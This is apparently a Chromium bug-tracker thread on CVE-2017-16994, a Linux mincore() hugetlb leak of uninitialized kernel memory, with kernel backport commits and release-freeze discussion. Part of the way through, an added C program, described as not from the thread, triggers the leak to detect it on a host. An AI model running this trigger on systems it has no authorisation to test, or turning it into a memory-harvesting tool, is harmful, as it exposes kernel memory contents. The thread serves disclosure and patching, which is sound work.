Security: Information Leak in mincore()

Issue description

Per https://bugs.chromium.org/p/project-zero/issues/detail?id=1431

Fix is at https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7c

Guenter, can you take a look?
Nov 29 2017
Affects Lakitu. Not enabled in Chromeos images. Already fixed in chromeos-4.14. Will only apply to chromeos-4.4.
Nov 29 2017
Guenter, this has a medium severity. Do you plan to backport the fix to 63 as well?
Nov 29 2017
Sorry, I just saw the M-63 label after my last post... I am asking because we are freezing 63 this week. The assigned CVE, CVE-2017-16994, is given a score of 3 by Red Hat, https://access.redhat.com/security/cve/cve-2017-16994. I am not sure if it's worth holding our freeze for the fix.
Nov 29 2017
#3/#4: Your images, your call. Let me know.
Nov 29 2017
GKE doesn't really support hugepages, but it looks like the exploit works even when there are no hugepages allocated. The patch doesn't look very intrusive and we plan to make an m63-stable release this week. It would be ideal to get it into m63-stable if we can. Our next release will only be in January (after production freeze).
Nov 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/third_party/kernel/+/6681fbe05e99608e74cc6d4a10327c250ce0c02d

commit 6681fbe05e99608e74cc6d4a10327c250ce0c02d
Author: Jann Horn <jannh@google.com>
Date: Thu Nov 30 02:04:58 2017

UPSTREAM: mm/pagewalk.c: report holes in hugetlb ranges

commit 373c4557d2aa362702c4c2d41288fb1e54990b7c upstream.

This matters at least for the mincore syscall, which will otherwise copy uninitialized memory from the page allocator to userspace. It is probably also a correctness error for /proc/$pid/pagemap, but I haven't tested that.

Removing the `walk->hugetlb_entry` condition in walk_hugetlb_range() has no effect because the caller already checks for that. This only reports holes in hugetlb ranges to callers who have specified a hugetlb_entry callback.

This issue was found using an AFL-based fuzzer.

v2:
- don't crash on ->pte_hole==NULL (Andrew Morton)
- add Cc stable (Andrew Morton)

Changed for 4.4/4.9 stable backport:
- fix up conflict in the huge_pte_offset() call

BUG=chromium:789497
TEST=Build and run

Change-Id: I80dfb0d9681f16b020740a842b5bcfbe00f8952c
Fixes: 1e25a271c8ac ("mincore: apply page table walker on do_mincore()")
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Guenter Roeck <groeck@chromium.org>
(cherry picked from commit a3805b10de80)
Reviewed-on: https://chromium-review.googlesource.com/796915
Reviewed-by: Daniel Wang <wonderfly@google.com>
Reviewed-by: Dylan Reid <dgreid@chromium.org>

[modify] https://crrev.com/6681fbe05e99608e74cc6d4a10327c250ce0c02d/mm/pagewalk.c
Nov 30 2017
Merge request is for chromeos-4.4 only.
Nov 30 2017
This bug requires manual review: We are only 4 days from stable. Please contact the milestone owner if you have questions. Owners: cmasso@(Android), cmasso@(iOS), gkihumba@(ChromeOS), govind@(Desktop) For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Nov 30 2017
The following revision refers to this bug: https://chromium.googlesource.com/chromiumos/third_party/kernel/+/eecf1b79631742d2969abeafac85151a3b5f3759

commit eecf1b79631742d2969abeafac85151a3b5f3759
Author: Jann Horn <jannh@google.com>
Date: Thu Nov 30 04:54:57 2017

UPSTREAM: mm/pagewalk.c: report holes in hugetlb ranges

commit 373c4557d2aa362702c4c2d41288fb1e54990b7c upstream.

This matters at least for the mincore syscall, which will otherwise copy uninitialized memory from the page allocator to userspace. It is probably also a correctness error for /proc/$pid/pagemap, but I haven't tested that.

Removing the `walk->hugetlb_entry` condition in walk_hugetlb_range() has no effect because the caller already checks for that. This only reports holes in hugetlb ranges to callers who have specified a hugetlb_entry callback.

This issue was found using an AFL-based fuzzer.

v2:
- don't crash on ->pte_hole==NULL (Andrew Morton)
- add Cc stable (Andrew Morton)

Changed for 4.4/4.9 stable backport:
- fix up conflict in the huge_pte_offset() call

BUG=chromium:789497
TEST=Build and run

Change-Id: I80dfb0d9681f16b020740a842b5bcfbe00f8952c
Fixes: 1e25a271c8ac ("mincore: apply page table walker on do_mincore()")
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Guenter Roeck <groeck@chromium.org>
(cherry picked from commit a3805b10de80)
Reviewed-on: https://chromium-review.googlesource.com/798471
Commit-Queue: Daniel Wang <wonderfly@google.com>
Tested-by: Daniel Wang <wonderfly@google.com>

[modify] https://crrev.com/eecf1b79631742d2969abeafac85151a3b5f3759/mm/pagewalk.c
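The commit message above (the same text accompanies both backport commits in this thread) says that walk_hugetlb_range() skipped a hugetlb range with no huge PTE instead of reporting it as a hole, so do_mincore() never wrote those entries of its scratch page and mincore() copied the page's stale contents to userspace. The probe below is an added example written for this page, not code from the bug thread, the kernel patch or the Project Zero report. It assumes a Linux host whose default hugepage size is 2 MiB and that MAP_HUGETLB|MAP_NORESERVE creates the mapping without faulting anything in (so the whole range is a hole to the page walker, matching the comment above that no hugepages need to be allocated); the function names, the sentinel value and the classification rule are the example's own.

```c
// Added example (not from the bug thread or the kernel patch): probe for the
// mincore() hugetlb-hole leak. Map a hugetlb region, never touch it, call
// mincore() with a sentinel-filled vector, then classify what came back.
// mincore() is only ever supposed to write 0 or 1 per page, so any other byte
// value is data the syscall did not produce: either our sentinel (range never
// processed) or, on an unpatched kernel, whatever the scratch page contained.
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#ifndef MAP_HUGETLB
#define MAP_HUGETLB 0x40000   /* Linux value; assumed for older headers */
#endif
#ifndef MAP_NORESERVE
#define MAP_NORESERVE 0x4000  /* Linux value; assumed for older headers */
#endif

#define HUGE_PAGE_BYTES (2u * 1024 * 1024)  /* assumption: 2 MiB default hugepage */
#define PROBE_SENTINEL 0xA5                  /* example's own marker value */

/* Count vector bytes that are neither 0 nor 1, i.e. not a valid mincore() status. */
size_t count_out_of_spec_bytes(const unsigned char *vec, size_t n) {
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (vec[i] > 1)
            bad++;
    return bad;
}

/* Count bytes still holding the sentinel: entries the syscall never wrote. */
size_t count_sentinel_bytes(const unsigned char *vec, size_t n) {
    size_t same = 0;
    for (size_t i = 0; i < n; i++)
        if (vec[i] == PROBE_SENTINEL)
            same++;
    return same;
}

/* Returns 1 if the kernel returned out-of-spec bytes for an untouched hugetlb
 * mapping (leak indicator), 0 if every byte was a valid 0/1 status, and -1 if
 * the probe could not run (non-Linux, no hugetlb support, mmap/mincore refused). */
int probe_hugetlb_mincore(void) {
#ifdef __linux__
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) return -1;
    size_t len = HUGE_PAGE_BYTES;
    size_t nvec = len / (size_t)page;      /* one status byte per base page */

    /* MAP_NORESERVE: the VMA is created even with an empty hugepage pool, and
     * nothing is faulted in, which is exactly the hole case the fix handles. */
    void *addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE,
                      -1, 0);
    if (addr == MAP_FAILED) return -1;

    unsigned char *vec = malloc(nvec);
    if (!vec) { munmap(addr, len); return -1; }
    memset(vec, PROBE_SENTINEL, nvec);

    int rc = mincore(addr, len, vec);
    size_t bad = count_out_of_spec_bytes(vec, nvec);
    size_t untouched = count_sentinel_bytes(vec, nvec);
    munmap(addr, len);
    free(vec);

    if (rc != 0) return -1;
    if (untouched == nvec) return -1;      /* syscall did not fill the vector */
    return bad > 0 ? 1 : 0;
#else
    return -1;
#endif
}

int main(void) {
    int r = probe_hugetlb_mincore();
    if (r < 0)
        printf("probe could not run on this host (no hugetlb support or syscall refused)\n");
    else
        printf("untouched hugetlb range via mincore(): %s\n",
               r ? "OUT-OF-SPEC BYTES RETURNED (possible leak)" : "clean 0/1 status bytes");
    return 0;
}
```

Run it as an unprivileged user; nothing needs to be reserved in /proc/sys/vm/nr_hugepages because the mapping is never touched. A result of 1 is a strong indicator, since the syscall contract only allows 0 or 1 per page. A result of 0 is not proof of a fixed kernel: the unpatched path copies whatever the freshly allocated scratch page happened to contain, which can legitimately be all zeros, so repeat the probe after exercising the page allocator (for example, after a build or a large file read) before concluding anything from a clean run.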
Dec 8 2017
Issue 793258 has been merged into this issue.
Mar 8 2018
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot